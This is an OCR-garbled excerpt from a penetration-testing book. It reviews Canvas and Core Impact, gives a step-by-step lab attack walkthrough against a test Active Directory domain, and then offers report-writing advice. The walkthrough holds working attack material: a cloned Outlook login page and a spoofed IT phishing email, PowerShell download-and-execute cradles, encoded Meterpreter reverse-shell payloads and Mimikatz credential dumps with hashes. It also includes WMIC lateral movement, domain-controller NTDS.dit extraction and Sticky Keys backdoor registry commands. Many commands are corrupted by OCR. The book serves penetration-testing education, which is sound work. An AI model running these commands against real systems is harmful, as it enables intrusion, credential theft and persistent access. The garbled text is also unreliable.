
• InvetvyDis - VulnDisco 

• Enable - VolPPack 


ALL Z CVC-2014 

* Raw R»9*« 

Name 


CVE.2014.$26l 


CVE.2014.5460 

adota .nath.< epypti •( «t obytaarray 

drupat.nwne.sq(i 

dr opal. n*r**_sqli_ callback 

t«.(mart up 

Imux .Tutex .requeue 

lmu« .pppol 2 tp 

linax.tty.race 

mqac 

ms 14.040 
rec«mmtg 



These guys provide monthly 0-day exploits for research they are working on. For example, D2 
focuses mostly on web 0-day exploits, while VulnDisco focuses mostly on service type 
vulnerabilities. For more information, go to: 

http://www.immunityinc.com/products/canvas/canvas-exploit-packs-overview.html 


Conclusion: 

Canvas is a great toolkit to have in your bag. The fact that it uses Python as its core makes it easy for 
many penetration testers to build their own modules and exploits. If you are looking for someone else 
to do a lot of the 0-day research on third party software, I highly recommend investing in Canvas. 


Core Impact 

t http://www.coresecurity.com/core-impact-pro I 

The last commercial tool I want to discuss is Core Impact. Core is probably one of the most 
expensive tools you can have in your offensive testing bag, but it is worth the price. Core Impact 
allows for easy automation of exploitation and is said to have 25% more unique Common 
Vulnerability Exploits (CVE) versus its competitors. 


For those who are really looking for a more automated visual approach, Core Impact is for you. It is 
an all-in-one tool to attack web, network, mobile, client and even wireless. Remember the good old 
days of auto-pwn? Well, Core has taken this to another level. With a click of a button, it is able to 
scan, compromise, take hashes/passwords, persistence and more. 
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Instaled 
Package Name 

j t CV€ Database Update 417 
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Core Impact 


Core Impact is modular like Metasploit, where you can pick and choose exploits to attack victim 
machines. The greatest benefit of Core Impact is that it i easy to use. Honestly, going through a 
network test is as easy as clicking on: 1) Network Information Gathering, 2) Network Attack and 
Penetration, 3) Local Info Gather, and so on. Their exploits are well-tested, actively work on IDS/AV 
evasion, and perform most of the local information gathering that you might do on a penetration test. It 
takes most of the manual work out of the test. 

The example below shows that I have compromised a host and kicked off the Local Information 
Gathering module. Core Impact automatically starts pulling local system information and passwords 
from common software that store passwords (browsers, Putty, Outlook), runs Mimikatz and more. 
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Core Impact - Exploitation 


Conclusion: 

Core Impact not only has a number of well-tested exploits outside the open source platforms, but 
easy to use throughout the whole pentesting cycle, which makes it a powerful tool. 
















Two-Minute Drill - From Zero To Hero 


Since the last book, I thought it would be helpful to include a walkthrough of a full attack. Here’s the 
scenario: You are on Day 5 of your test and you haven’t been able to exploit the SUCK network. It’s 
time for the two-minute drill. You have two minutes left and you need to go from your ten-yard line 
and cover the next 90 yards. This isn’t the only way or even the best way of doing a penetration test, 
but it is one theoretical attack path. 


Ten-Yard Line: 


First, we need to get email addresses by using Discover and Recon-NG from the Before the Snap 
section. This results in a handful of email addresses. Through testing, we have figured out that emails 
with an Office extension (docx, pptx, xlsx) do not pass through their mail filter. 


o«n/pag»«/pa» wva-racon.htm_ 



~ c 

Security ^Kali Linux "^KaliOocs OE*p*o«t*DB ItAircrack-ng 

Home Contacts DNS 

Domain 

File* 

Reports 


Active Recon 

Reports: Passive Recon 

Passive Recon 


Suimary 


Emails 18 
Hanes 87 
Hosts 9 
Squatting 48 
Subdomains 32 
Te*t 1 


Emails (18) 

dsuck.testlab 
elldsuck.testlab 
feedbackgsuck.testlab 
jaydsuck.testlab 
]gallegos$$uck.testlab 
Jgrosser^suck.testlab 
joedsuck.testlab 
justthetipdsock.testlab 
markdsuck.testlab 
nikedsuck.testlab 
opensource@suck.testlab 
plathropdsuck.testlab 
rondsuck.testlab 
samnydsuck. testlab 
sbakerdsuck.testlab 
sfrenchdsuck.testlab 
supportdsuck.testlab 
synackdsuck.testlab 

Names (87) 


Ackerson, Ratt 
Adelson. Jay 
Ahuja, Nancy 

w'p<vs«»e-fe<on him _ 

Gathering Email Addresses 


Twenty-Yard Line: 


We then go to The Screen section, and use SET to set up a fake website, which clones their Outlook 
Web Application (OWA) external site. Then use the script from/opt/spearphishing/client/spear.py to 
send out multiple spoofed emails from IT. 







^ https: ■ fake.suck.testlab/owa/auth/logon.aspx?ge=f3a3beefabecaa53 " “ C | | Search 


Microsoft" 

Outlook Web App 

Security ( show explanation ) 

This is a public or shared computer 
© This is a private computer 

O Use the light version of Outlook Web App 

User name: victim@suck.testlab| 

Password: 



Connected to Microsoft Exchange 
© 2010 Microsoft Corporation. All rights reserved. 



Outlook Web Upgrade • m** x m« x w ib 

8:52 PM (0 minutes ago) 4s. 

to me R 

IMPORTANT 

Due to a recent rise in security breaches in our industry, we have upgraded 
our Outlook Mail system 

Please visit https //suck testlab com/owa t o make sure you can still login 
Failure to do so may result in your account being locked out. 


Thank you for your co-operation, 
IT Security 


This email may contain confidential and privileged information for the 
sole use of the intended recipient. 

Any review or distribution by others is strictly prohibited. 

If you are not the intended recipient, please contact the sender and delete 
all copies. Thank you. 


Spear phishing 


Afterwards, we obtain a few passwords and validate that we can log into OWA. Now that we on 
their internal mail system, we have the ability to skip the Email proxy and send files from one user to 
another with Microsoft Excel documents. 


Thirty-Yard Line: 


Going back to the Special Teams section, create a malicious Excel file using Generate-Macro.ps. 
This will place a PowerShell reverse HTTPS Meterpreter script onto the victim host and make a 
registry entry to add persistence on reboot. 

With that Excel file, we log into the accounts we captured to see with whom they are communicating. 
Since we need the user to click the “Enable Macros” button, we need to find and build a trust 
relationship. Therefore, look for someone who has had conversations in the past and make our Excel 
files look like the ones they are sending back and forth. In the reply email, make sure you specify that 
the recipient opens the Excel file and clicks on the “Enable Macros” button. 


Before they open the email, we need to start up a Meterpreter handler. We kick off Easy-P, and select 
PowerShell Meterpreter to create the code for a resource listener file. With a quick msfconsole -r 
listener.rc, we now have a full handler running. 




















Once the victim opens our malicious file, we get a Meterpreter shell! 


is i exploit f I’udjuII i-1 } > 

t'l 192.168 J99.1:24153 Request received for /INITM.., 

( # J 192,163.199,1:24153 Staging connection for target /IMITM received.., 

VI Meterpreter session 3 opened (192.168,199.128:443 -> 192.168.199.1:24153] 

msf exploit (I i mil. i ) > sessions -i 3 
[*) Starting interaction with 3... 

interpreter > shell nf7 f 

Process 16676 created. 

Channel 1 created. jt\f 

Microsoft Windows [Version 6,1.7601) 

Copyright (c) 2609 Microsoft Corporation. All rights reserved._ 


Meterpreter Shells from Spear phishing 


Fifty-Yard Line: 


Sadly, we find out we a power user with limited rights. We won’t be able to dump hashes just yet. 
So, we run Powerup from a shell to see if there are any ways to get to system 


C:\U«i's\tKti(i£fluht>pDiifirih(]l -uirsion 2 -nop -imc bypass l£)i (New-Otij^t hrt.HKliwtf.DowfllMdStfl^Chtt^ 
lertork/PcNerTools/niaster/PoHerUp/PMerUp. psl ’ ); Invoke-AllChecks 

[ p ] ftoHninj IitVOhl-AllCNckt 

[ r ] Checking for unquoted service paths... 

['] Use 'Ifriti^sirtiffiirvkiBiniFy 1 to *buse 

[*] Unvoted service path: BACereService - t:\Pfflgrii Files AsiUt4fft\C^\0ACortn«o* 

[*] Chicking iirviti ixicuttbJf pMiktlm.. 

[■] Use ‘Writi-SeruiciEXE -^rviceNane SK' to abuse 

[*] Vulnerable sittin executable: oaniserv ■ "C:Woff» Filis\Flii(ifpi'l(it JtNHfr 
[ r j Checking service permissions... 

[‘] Chicking for unit tended instill fills. P , 

[*] Checking for potentially hijackable .dll locations.,, 
jt] Hijickable .dll pith: C:\PrOgfto PiMfingflrprint Ninigir Srt\ 

[tj Hijickible .dll path: C:\ftb(riifl|t|\fleid^\ 

[*] Checking for AlnysInstallElevated registry key... 

I * I_i* L... I. 1 - J I* Ji_li.frilm* _ [j _ 


Privilege Escalation 


Luckily, we find an unquoted service and Write-ServiceEXE issues. We ranPowerUp to abuse those 
vulnerabilities, create a new user, and restart the service. A quick “runas” command execution allows 
us to kick off another Power Shell Invoke-Shellcode Meterpreter using the Administrative account we 
just created. With a quick bypassuac injection and getsystem on Meterpreter, we are now system! 


We jump back to Easy-P and generate a Mimikatz command: 


==€asy-P= 


[1] Privilege Escalation 

[2] Lateral Movement 

[3] Keylogging 

[4] PowerShell Meterpreter 

[5] Change Users Execution Policy 

[6] Powershell 101 

[7] Base64 Encode a PowerShell Script 

[8] Mimikatz * Passwords from Memory 
[99] Exit/Quit 


Select An Option: 8 

[*]Powershell.exe -NoP -NonI -Exec Bypass IEX (New-0b]ect Net.WebClient).Downloa 
dString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltratio 
n/Invoke-Mimikatz.psl'); Invoke-Mimikatz 

[*]Base64 encoded version download and execute: 

Powershell.exe -NoP -NonI -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBj 
AHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBu 
AGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABl 
AG4AdAAuAGMAbwBt AC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBt AGEAcwB© 
AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYOB0 
AHoALgBwAHMAMQAnACkA0wAgAEkAbgB2AG8AawBlAC0ATQBpAG@AaQBrAGEAdAB6AA==_ 


PowerShell - Invoke Mimikatz 


When we run the PowerShell Invoke-Mimikatz as system, we can grab the user password from 
memory. 


C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient 

erSploit/master/Exfiltration/Invoke-Mimikatz.psl')5 Invoke-Mimikatz 

.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C“ (May 20 2014 08:56:48) 

.## A ##. 


## / \ ## /« * * 


## \ / ## Benjamin OELPY ‘gentilkiwi’ ( benjamin@gentilkiwi.com ) 

'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 

'#####• 

with 14 modules * * */ 

mimikatz(powershell) # sekurlsa::logonpasswords 

Authentication Id : 

0 ; 30S524 (00000000:0004a974) 

Session 

Interactive from 1 

User Name : 

testuserl 

Domain : 

HACKER 

SID : 

S-1-5-21-3525058729-1821581466-2040179600-1106 

msv : 


[00000003] Primary 

* Username 

: testuserl 

* Domain 

: HACKER 

* NTLM 

: 0aa3d8c4a87962d9356e09480de5ebbe 

* SHA1 

: 91fd3da0e2456fbld31663b938Se881e705aS61c 

tspkg : 


* Username 

: testuserl 

* Domain 

: HACKER 

* Password 

: lAsdfasdfasdfl! 

wdigest : 


* Username 

: testuserl 

* Domain 

: HACKER 

* Password 

: lAsdfasdfasdfl! 

kerberos : 


* Username 

: testuserl 

* Domain 

: HACKER.TESTLA8 

* Password 

: lAsdfasdfasdfl! 


Passwords from Memory 


Seventy-Yard Line: 






Now that we have the user’s password, let’s find who the Domain Admins are. From a shell, we 
type: 

• net group “Domain Admins” /domain 

• C:\Users\testuserl>net group "Domain Admins" /domain 

The request will be processed at a domain controller for domain hacker.testlab. 

Group name Domain Admins 

Comment Designated administrators of the domain 
Members 


Administrator lab 

The command completed successfully. 

From the results, we see that “lab” is a domain admin. Let’s see where he is logged in. From the 
Lateral Pass section, we looked at Power View and the UserHunter functionalities. It queries all of 
Active Directory for hosts and sees what users are logged in to each individual host. 

• Powershell.exe -NoP -NonI -Exec Bypass LEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-UserHunter -UserName "lab" 


C:\Users\testuserDPowershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebCl 
ork/PowerTools/master/PowerView/powerview.psl'); Invoke-UserHunter -UserName "lab" 
[*] Running Invoke-UserHunter with delay of 0 

[*] Using target user 'lab'... 

[*] Total number of hosts: 3 

[+] Target user ’lab’ logged into WIN8.hacker.testlab (172.16.151.201) 

(+] Target user 'lab' logged into WIN8.hacker.testlab (172.16.151.201) 

[+] Target user ’lab’ logged into WIN8.hacker.testlab (172.16.151.201) 

[+•] Target user 'lab* logged into WIN8.hacker.testlab (172.16.151.201) 

[+] Target user 'lab' logged into DC.hacker.testlab (172.16.151.200) 

[+] Target user ’lab' logged into DC.hacker.testlab (172.16.151.200) 


Finding Which Computer the Domain Administrator is on 


We know we can’t log into the Domain Controller, but we do have access to the Win8 host. To move 
laterally, we can execute commands on report hosts using WMIC. The payload we want to execute is 
a PowerShell Meterpreter on that particular host: 

• LEX (New-Object 

Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.psF); Invoke-Shellcode -Payload windows/meterpreter/reversehttps - 
Lhost 172.16.151.128 -Lport 8080 -Force 


I want to reiterate one note, as I see it happen a lot with PowerShell. If you are attacking a Windows 
32-bit vs 64-bit system through WMIC, they may require different commands. The first command is 
targeting 32-bit systems and the second command below targets 64-bit systems: 

• wmic /USER:"hacker\testuserl" /PASSWORD:" !Asdfasdfasdfl!" 
/NODE: 172.16.151.202 process call create "powershell -EncodedCommand 





SQBFAFgAIAAoAE4AZQB3AC0A...AAwACAALQBGAG8AcgBjAGUA" 

• wmic /USER:"hacker\testuserl" /PASSWORD:" !Asdfasdfasdfl!" 
/NODE: 172.16.151.201 process call create 

"%WinDir%\syswow64\windowspowershell\vl.0\powershell.exe -enc 

S QBF AF gAIAAo AE4 AZQB 3 ACO A... AAw AC AALQBGAG8 AcgBj AGUA" 



wmic /USER:"hack«r\testuseri"VPASSWQRO:"!Asdfasdfasdf1!" /NODE:172.16.151.261 p 
rocess call create "WinOir%\syswow64\Vindowspowershell\vl.0\powersheU.exe -enc 
| "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHOAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgBGAC 
kALgBEAG8A(jwBuAGwAbw6hAGQAUwB0AH I AaQBtiAGc AKA AnAGgAdAB0AHAAcwA6AC8ALwByAGE AdwAuAG 
cAaQBGAGgAdOBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtACBAYwBoAGUAZQBOAHoALwBQAG 
8AdwB\AHIAUwBwAGwAbw6pAHQALwBtAGEAcwB0AGOAcgAvAEHAbwBkAGUARQB4AGUAYw61AHOAaQBvAG 
4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbv.BkA(»UALgBwAHMAMQAnACkAOwAgAEkAbgB2AG 
8AawB\ACGAUwBoAGUAbABsAGMAbwBkAGUAIAAt AFAAYQB5AGv> AbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC 
8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG 
8AcwB0ACAAMQA3ADIALgAxADYALgAxADUAMQAuADEAHgA4ACAALQBMAHAAbwByAHQAIAA4ADAAOAAwAC 
AALQBGAG8Ac gBj AGUA" 

Executing (Win32_Process)->Create() 

Method execution successful. 



}; 


C:\Users\testuserl> 

|*I 172.16.151.201:49977 Request received for /INITM... 

|*1 172.16.151.201:49977 Staging connection for target /INITM received... 

1*1 Meterpreter session 11 opened (172.16.151.128:8080 -> 172.16.151.201:49977) 
at 2015-02-14 17:11:02 -0500 


L 


Remotely Executing PowerShell Using WMI 









































































































































Eighty-Yard Line: 


We now have a Meterpreter Shell on that host and find that we are a local admin on that host. We run 
a quick getsystem and will need to pull hashes. We drop back into Easy-P, create a dump hashes 
command, and execute: 


File Edit View Search Terminal Help 


==Easy-P== 


[1] Privilege Escalation 

[2] Lateral Movement 

[3] Keylogging 

[4] PowerShell Meterpreter 

[5] Change Users Execution Policy 

[6] Powershell 101 

[7] Base64 Encode a PowerShell Script 

[8] Mimikatz • Passwords from Memory 
[99] Exit/Quit 


Select An Option: 8 

[♦JPowershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object Net.WebCl: 
tz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.psl'); Invoke-Mii 

[*]Base64 encoded version download and execu te: 

Powershell.exe -NoP -Nonl -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0/ 
EAG8AdwBuAGwAbwBhAGQAUwBOAHIAaQBuAG«AKAAnAGgAdAB0AHAAcwASAC8ALwByAGf 
BtAC8AYwBoAGUAZQBGAHoALwBQAG8AdwBlAHIAUwBvAGwAbwBpAHQALwBtAGEAcwB0A< 
QBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBl4C0AipBpl 


Generating PowerShell to Dump Hashes 






root@)k»li: /opt 


root@kili /opt/HP_PowerS| 


C:\Windows\system32>Powershell .axe -NoP -Nonl -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3t 
EMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaGBuAGcAKAAnAGgAdAB0AHAAcwA6AC8AU 
BvAG4AdABlAG4AdAAuAGMAbwBtAC8AYw8oAGUAZQB0AHoALw8QAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGIj 
Abw6uAC8ASQBuAHYAbw6rAGUALQBNAGkAbQ8pAGsAYQB0AHoALgBwAHHAMQAnACkAOwAgAEkAbgB2AG8Aaw8' 
lPowershell.exe -NoP -Nonl -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATw8iAGoAZQBjAHQA 
gBEAG8AdwBuAGwAbwBhAGQAlVBOAHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8AlwByAGEAdwAuAGeAaQB0Ai 
MAbw8tAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUw8wAGwAbwBpAHQALwBtAGEAcwB0AGUA ; : 1 i-.M 
rAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8Aaw8lAC0ATQBpAG0AaQBrAGf 


.#####. 
.## A ##. 
## / \ ## 
## \ / ## 
'## v ##' 
'#####’ 


mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 20 2014 08:56:48) 


/• 


Benjamin DELPY ’gentilkiwi' ( benjamin0gentilkiwi.com ) 
htt p://blog.gentilkiwi.c om/mimikat z (oe.eo) 

with 14 modules * * */ 


mimikatz(powershell) # sekurlsa::logonpasswords 


Authentication 

Session 

jUser Name 

Domain 

SID 


Id 


0 ; 176782 
Interactive) 
lab 
HACKER 
S-1-5-21 



b2fkl 


8»46toe40E796 >Q-r (»l 


pn 

jLu 


msv : 
[00000003] 

* Username 

* Domain 

* NTLM 

* SHA1 
tspkg : 

* Username 

* Domain 

* Password 


Primary “the quieter you become, the 

: lab 
: HACKER 

: 0aa3d8c4a87962d9356eO9480de5ebbe 
: 91fd3daOe2456fbld31663b9385e881e705a561c 


lab 

HACKER 

lAsdfasdfasdfl) 


Executing PowerShcll Mi mik atz 


Goal Line: 


We have obtained the password for a Domain Administrator. Let’s use Metasploit and pull the hashes 
off of the Domain Controller. 

Metasploit has a great module to pull hashes: 

• use auxiliary/admirfsmb/psexecntdsgrab 

• Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 

• exploit 




auxiliary) m l , 1 ) > show options 

lit option* (4uxiUary/«diiln/siit>/psexoc_ntdtgrat>^ 


Currsmt Sotting 


R*dul»*0 D**cration 

. .' 


CREATE NEW VSC 
RHOST ' 

RPORT 

SERVICE DESCRIPTION 

service'dispiay mhe 
service’nahe 

SHBOonaln 

SNBPass 

SNBSHARE 

SNBUssr 

VSCPATH 

WINPATH 


auxiliary! i 

|*| 172.16.151. 
1*1 172.16.151. 
1*1 172,16.151. 
1*1 172.16.151. 
1+1 172.16.151. 
1+1 172.16.151. 
M 172.16.151. 
|*| 172.16.151. 
1*1 172.16.151. 
1*1 172.16.151. 
Cl 172.16.151. 
|t| 172.16.151. 
t 

Cl 172.16.151. 
M 172.16.151. 
.Din 

Cl 172.16.151. 
Cl 172.16.151. 
Cl Auxiliary ■ 
auxiliary) i 


falsa 

172.16.151.260 
445 


hackar.tastlab 

lAsdfasdfasdflT 

C$ 

lab 


It) > axploit 


If true, attempts to create a v 

The torgat address 

Set the Sftjiervlce port 


'Olune shadow copy 


Service description to lobe used on target for pretty listing 

The service display naae 
The service naae 

The Windows doitaln to use fo^l^Mjcnion 

The password for the specified usempHA 

The nane of a writeable share on the erver 

The username to authenticate as 

The path to the target Volume Shadow 

The none of the Windows directory (examples: WINConS, WtNNT) 


.260:445 • Checking if a Volune Shadow Copy exists already. 

.266:445 • Service start timed out, OK if tuning a command or non service executable.., 

.266:445 • No VSC Found. ^_ 

.266:445 - Creating Voluae Shadow Copy 

.206:445 - Se r vice st art ti ned ou t . OK If running a per ind or non-service axttccitjdlo... 

.206:445 VoWWo>i*low Cfey ere ite I or) \\?\ HOI •.“COT' Di vlf^lHa 001s* tiu 4S» >(* ..CpyV 
.266:445 - Soft lea start tiro I oi t, K : f run ilni a koailai d or no - art I :a wcutabfe... 

.266:445 • Chmckfcg If MDSld t t ts opJ id. I . / 1 

.266:445 • Series *ar r tiip «L K i f run ilnL [c»« at d n no • er\i :e 'icufebiV.. . 

.266:445 1 Seif )lce\<tarfltlifcl outJ K i f run tlnod tomw ild l\flOB- Wvica 4 ttciflbl4 ... \ 

.266:445 ■Downloading ntds.dit file % \ 

.266:445 ■ ntds.dit stored at , r&p;/.»sf4/logtr20156214180250jlefMtJ724^. 15|l.£j>6jkBx«c.ntaMr«b 

.260:445 • Downloading SYSTEM hive file 

.266:445 - SYSTEM hive stored at /root/.asf4Aoot/20150214100253.dafault.l72.16.151.260.pe#xac.ntdsgi 

.266:445 • Executing cleanup... 1 

.266:445 • Cleanup was successful 
module execution coopleted 
l "> ■ ntii ii,ib) > show actions 


Dumping the Domain Controller Hashes 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file to the /root/.ms4/loot/ 
folder. Next, convert the dit file to hashes with esedbtool and NTDSextract. 


esedbexport command: 

• esedbexport -t [Location of Export] [NTDS.dit file] 

• /opt/esedbtools/esedbexport -t /tmp/ntds 

/root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158. 


:/opt# /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/l 
ot/2G150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 
esedbexport 20120102 


Opening file. i fii r\n 11 

Exporting table 1 (MSysObjBets) out of 14. 

Exporting table 2 (MSysObj ectsShadoii) out of 14. | 

Exporting table 3 (MSysObj ids! YoulX flf lff\ 1 
Exporting table 4 (MSysLocales) out of 14. 

Exporting table 5 (datatable) jout ^f 14..„ beprunp ' 

Exporting table 6 (hiddentabrer e out mjt iM 1 . J'' JU u 
Exporting table 7 (linkhistorytable) out of 14. 

Exporting table 8 (link_table) out of 14. 

Exporting table 9 (sdpropcounttable) out of 14. 

Exporting table 10 (sdproptable) out of 14. 

Exporting table 11 (sd_table) out of 14. 

Exporting table 12 (MSysDefrag2) out of 14. 

Exporting table 13 (quota_table) out of 14. 

Exporting table 14 (quota_rebuild_progress_table) out of 14. 
Export completed. 


W) out 

kjF\ 


oi 14. 


Recovering the NTDS.dit 


Next, we need to run dshashes.py to convert our tables to password hashes: 

• dshashes.py [datatable table] [link table] —passwordhashes [original bin file from 




ntdsgrab] 

• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 
/tmp/ntds.export/link_table.7 /tmp/ —passwordhashes 

/root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578. 


•Jo pt# python /opt/NTDSXtract/dshashes.py , ' tds.export/datatable.4 /tmp/nti 

ds.export/link_table.7 /tmp/ --passwordhashes 7root/.msf4/1oot/20150214180253_default_l 
72.16.151.200_psexec.ntdsgrab._127578.bin 
-Running with options: 

Extracting password hashes 
'Initialising engine... 

^Scanning database - 100% -> 3824 records processed 
jExtracting schema information - 100% -> 1738 records processed 
-Extracting object links... 

List of hashes: 


jAdministrator:500:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe: f: 
lab:1001:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
ikrbtgt:502:aad3b435b51404eeaad3b435b514O4ee:04f3c2fa6Oed9f8f308O3df6837ebed3::: 
testuserl:llO6:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356eO9480de5ebbe::: 
Itestuser2:lio7:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
|limited_user:1110:aad3b435b51404eeaad3b435b514O4ee:Oaa3d8c4a87962d9356e0948Ode5ebbe::: 
jliisiteduser: 1111 :aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
root@kali :/opt* | 


Parsing Hashes 



Touchdown! Touchdown! Touchdown! 


We have just dumped the whole Active Directory environment! Lastly, we add a little backdoor for 
persistence. We quickly run a few registry changes on the Domain Controller and all the hosts in 
order to enable the Sticky Key backdoor. 


• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersionMmage File Execution Options\sethc.exe\" /v Debugger It REG SZ 
/d \"C:\windows\system32\cmd.exe\" /f* 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 

"C:\Windows\system32\reg.exe ADD 

\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Tcp\" /v User Authentication /t REGDWORD /d 0 /f' 

• wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 

"C:\Windows\system32\reg.exe ADD 

\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Tcp\" /v SecurityLayer It REG DWORD /d 0 /f' 


Now, even if they change all their passwords, we still have a system shell on their DCs. 





Sticky Key 


The crowd goes wild and you pull out your best touchdown dance. With that successful two-minute 
drill, you go home complete and ready to write your report. 






Post Game Analysis - Reporting 


Success! You have finally fully compromised Secure Universal Cyber Kittens, pivoted to sensitive 
networks, stolen credentials and documents, and managed to keep backdoors on their servers. Now, it 
is time to wrap up the test and write the final report. 


The final delivered report is really the only thing that will matter to the client. The report is how you, 
the penetration tester, will get paid and be asked to come back. Therefore, this is by far the most 
important aspect of your test. You need to be able to explain the findings, rate the vulnerabilities, and 
explain how the results will affect the customer in the real world. Regardless of how many hosts you 
compromise or how quickly you move laterally through the network, if the client can’t understand the 
end report, reproduce exploitation, and effectively implement remediation, it is not worth its value. 
Anyone can run a vulnerability scanner and change the organization name, but not everyone can 
understand what the vulnerabilities actually mean. 


If you have ever had multiple penetration testers assess your network, you will find that the reports 
will vary based on who is performing the test. Some pentesting companies will just re-template a 
vulnerability scanner report, while quality pentesting companies will provide a well-detailed report 
and include repeatable steps. There is little value in a report that merely states that the client has 100 
critical Apache/PHP findings. Real value comes from the fact that the report can confirm whether or 
not the findings are valid based on the vulnerability, not just based on the banner version. 


Your final report should be influenced by your own presentation style and findings. However, I will 
give you some hints and best practices when creating your report. 

Some things to think about when writing a report: 

• I say this every time: DON’T SUBMIT A RE-TITLED Nexpose or Nessus report. I 
have seen this happen more than once or twice in my lifetime, where we received a 
re-titled report from a consulting company. 

• Rate your vulnerabilities 

o You should figure out a way to consistently rate your vulnerabilities. 
I have built my own matrix that includes references from NIST, DISA, 
CVSS, and personal experience to assign ratings to vulnerabilities, 
o The matrix includes increasing or decreasing severity based on 
internal/external findings, possible availability of exploit code, how 
widespread their systems are, what the exploits can lead to, and how it 
affects the CIA security triangle. 

o Vulnerabilities that go through my matrix will always have the same 
criticality level. If a client asks how I scored a rating for a 
vulnerability, I can reference my matrix. 

o You might have a vulnerability that might be a “medium” in severity 
to the scanner, but what if it is systemic? If it is found not on one host 



but on every host, does the overall severity of the issue turn to “high”? 

• Theoretical vs. Real Findings 

o I generally do not like to mark findings as critical if they are only 
theoretical and have no actual known exploit available. These should 
still be considered findings, but I will generally lower the rating if I 
can't find any avenue to exploit the host. 

o This gives the client help in properly identifying which findings need 
immediate attention versus those that can be applied during a regular 
change control window. 

• Solutions are just as important as the findings 

o If you use a tool to compromise a network, you have to have a 
solution to stop it. 

o If you don't have a solution, help the client develop a mitigation 
strategy. 

• Don’t mis-rate vulnerabilities 

o HTTP Flags: As I have said in the prior book, I still see HTTP flags 
all the time. A scanner will come back with flags not being enabled, 
such as secure flag or missing httpOnly. What if the site doesn’t even 
support any type of client authentication or even provide a user with 
any input variables? It is definitely a finding, but it could be 
significantly lower than the scanner outputs. 

o Cross site scripting can be very dangerous, but having a “high” 
finding within a forum versus a site that has no users or data to be 
inputted to a backend database, should have very different ratings, 
o Apache Findings: This is a great example of what I feel distinguishes 
good reports from bad reports. Apache findings come up all the time 
because they are solely based on banner results. You might see a PHP- 
CGI finding that comes up as critical and report it, but when the client 
investigates it, he/she finds that CGI wasn’t even enabled on the server. 

• Make sure vulnerabilities are actual vulnerabilities 

o I don't know how many times I have received penetration testing 
results telling me my systems had PHP exploits on them. This is 
because the scanner, based on version, alerted them of these critical 
findings. Some of the findings state that they are PHP CGI issues or 
Apache mod security issues. The problem is my servers don't run the 
CGI scripts, but the scanner identified the issue just solely based on 
versioning. Please make sure that you validate that findings are actual 
findings. 

• Standardize all your reports by using LaTex templates or something similar. 


Again, all these findings should be reported, but having the right severity rating is what is important. 
It is critical when writing a penetration test to identify what is realistic versus what is theoretical. I 
generally have two parts to a report-the first is what can actually be done with known exploits, and 
the second is everything else that the scanner picked up. 



What you shouldn’t you do: 

http://it.toolbox.com/blogs/securitymonkey/the-worlds-worst-penetration-test-report-by- 

scumbagpentester-5 8747 

What you should have in your report: 

• Introduction/Overview 

o High-level description of the project, dates, and 
company/infrastructure being tested. 

• Scope and Objectives 

o This section should outline the IP ranges, URLs, and applications that 
